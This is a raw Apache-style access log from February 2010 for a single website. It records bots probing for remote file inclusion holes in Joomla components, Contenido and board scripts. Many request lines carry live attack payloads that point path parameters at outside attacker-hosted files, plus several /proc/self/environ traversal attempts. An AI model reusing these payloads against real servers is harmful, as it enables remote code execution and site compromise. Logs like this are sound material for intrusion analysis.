85.214.67.226 - - [21/Feb/2010:09:52:19 -0800] "GET /logs/access_100115.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:19 -0800] "GET /logs/access_100115.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:52:19 -0800] "GET /errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:09:53:21 -0800] "GET /logs/access_100207.log//include/prodler.class.php?sPath=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:09:53:33 -0800] "GET /delete_all.php?board_skin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:09:53:33 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:09:53:34 -0800] "GET /logs/access_100121.log//delete_all.php?board_skin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:53:40 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:53:40 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:53:41 -0800] "GET /logs/access_100123.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
85.214.67.226 - - [21/Feb/2010:09:53:41 -0800] "GET /logs/access_100123.log/errors.php?error=http://immortal-killaz.servercamp.de/fanatix/cmdstate.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16" "www.puaga.com"
89.221.175.32 - - [21/Feb/2010:09:53:42 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.miranda.gov.ve/images/stories/thumbs/grop_member.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
164.124.107.60 - - [21/Feb/2010:09:53:50 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:54:55 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:54:55 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:54:55 -0800] "GET /logs/access_100203.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:54:56 -0800] "GET /logs/access_100203.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:54:56 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:54:56 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.200.89.25 - - [21/Feb/2010:09:56:02 -0800] "GET /logs/access_100114.log//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/cc??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.200.89.25 - - [21/Feb/2010:09:56:03 -0800] "GET /index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/cc??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.805" "www.puaga.com"
74.200.89.25 - - [21/Feb/2010:09:56:03 -0800] "GET /logs//index.php/component/option,com_performs/formid,1/Itemid,41//index.php/index.php?mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/cc??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:57:29 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:57:29 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:57:30 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:57:30 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:57:30 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [21/Feb/2010:09:57:31 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:09:58:00 -0800] "GET /logs/access_100205.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:09:58:00 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:09:58:00 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:58:24 -0800] "GET /logs/access.log%20%20///components/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:58:24 -0800] "GET //components/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:09:58:24 -0800] "GET /logs///components/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:09:58:51 -0800] "GET /logs/access_100203.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:10:00:22 -0800] "GET /logs/access_100120.log%20%20///components/index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:10:00:50 -0800] "GET /logs/access_100204.log///components/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:10:00:50 -0800] "GET /logs///components/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:10:00:50 -0800] "GET //components/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:10:00:51 -0800] "GET /logs///components/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:10:00:51 -0800] "GET //components/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:10:00:51 -0800] "GET /logs/access_100204.log///components/index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:01:23 -0800] "GET /logs/access.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:01:30 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:01:30 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:01:30 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:10:01:40 -0800] "GET /logs//themes/container.php?/sidebar.php=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:10:01:40 -0800] "GET /themes/container.php?/sidebar.php=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:10:01:40 -0800] "GET /logs/access.log%20%20//themes/container.php?/sidebar.php=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:10:01:52 -0800] "GET /logs/errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:10:01:52 -0800] "GET /errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:10:01:52 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [21/Feb/2010:10:01:55 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://lifehappens.org/catalog_ZEN_old/extras/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:10:02:34 -0800] "GET /logs/access_100116.log%20%20//themes/container.php?/sidebar.php=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:03:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:03:33 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:03:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:05:15 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:05:15 -0800] "GET /logs/access_100122.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.203 - - [21/Feb/2010:10:05:15 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:05:44 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:05:44 -0800] "GET /logs/access_100205.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:05:44 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [21/Feb/2010:10:05:50 -0800] "GET /logs/access_100212.log//index.php?option=com_newsfeeds&mosConfig.absolute.path=http://www.neosemitech.com/board/data/bogel/pakmin/scripts/log.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [21/Feb/2010:10:05:50 -0800] "GET /logs//index.php?option=com_newsfeeds&mosConfig.absolute.path=http://www.neosemitech.com/board/data/bogel/pakmin/scripts/log.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [21/Feb/2010:10:05:51 -0800] "GET /index.php?option=com_newsfeeds&mosConfig.absolute.path=http://www.neosemitech.com/board/data/bogel/pakmin/scripts/log.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
94.23.0.61 - - [21/Feb/2010:10:06:46 -0800] "GET /logs/access_100214.log//index.php?option=com_newsfeeds&mosConfig.absolute.path=http://www.neosemitech.com/board/data/bogel/pakmin/scripts/log.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:06:54 -0800] "GET /logs/access_100205.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:07:23 -0800] "GET /logs/access.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:07:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:07:38 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:07:39 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:10:07:50 -0800] "GET /logs/access_100128.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:10:07:50 -0800] "GET /logs/access_100119.log%20%20///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:10:07:51 -0800] "GET /logs///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:10:07:51 -0800] "GET //?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:07:55 -0800] "GET /logs/access_100127.log%20//home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:07:55 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:08:00 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:10:08:28 -0800] "GET /logs/access_100204.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:10:08:30 -0800] "GET /logs/access.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:08:46 -0800] "GET /logs/access_100208.log%20//home//conlib/local.php?cfg[path][contenido]=http://sonorisation45.fr/images/songs/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:10:08:49 -0800] "GET /logs/access_100122.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:10:09:00 -0800] "GET /logs/access_100122.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:09:38 -0800] "GET /logs/access_100127.log//home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:09:39 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:09:39 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.parisplayground.com/paris/soirees/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:09:49 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:09:49 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:09:49 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:09:49 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:09:49 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:09:49 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:10:16 -0800] "GET /logs/access_100124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [21/Feb/2010:10:10:17 -0800] "GET /logs/access_100124.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:11:44 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:11:45 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.97.159.28 - - [21/Feb/2010:10:11:45 -0800] "GET /logs/access_100122.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://etc.fiz.su/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:26 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:26 -0800] "GET /include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:26 -0800] "GET /logs/access_100127.log%20%20//include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:26 -0800] "GET /logs/access_100207.log%20%20//include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:14:27 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:14:27 -0800] "GET /logs/access_100129.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
61.63.82.14 - - [21/Feb/2010:10:14:28 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
218.234.21.178 - - [21/Feb/2010:10:14:36 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
